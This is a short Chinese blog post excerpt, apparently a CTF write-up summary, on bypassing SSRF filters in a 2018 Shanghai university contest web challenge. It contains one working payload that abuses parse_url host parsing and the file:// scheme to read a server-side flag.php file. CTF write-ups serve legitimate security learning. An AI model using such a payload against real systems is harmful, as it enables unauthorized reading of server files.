Fork me on GitHub
2018年11月8日
ssrf绕过记录
摘要: 第一道题来自2018 上海市大学生网络安全大赛线上赛web01 对协议没有限制,可以用file协议 payload: url=file://@127.0.0.1:80@www.ichunqiu.com/./..//var/www/html/flag.php parse_url 取出的Host是www 阅读全文
posted @ 2018-11-08 12:30 Afant1 阅读(3826) 评论(0) 推荐(1)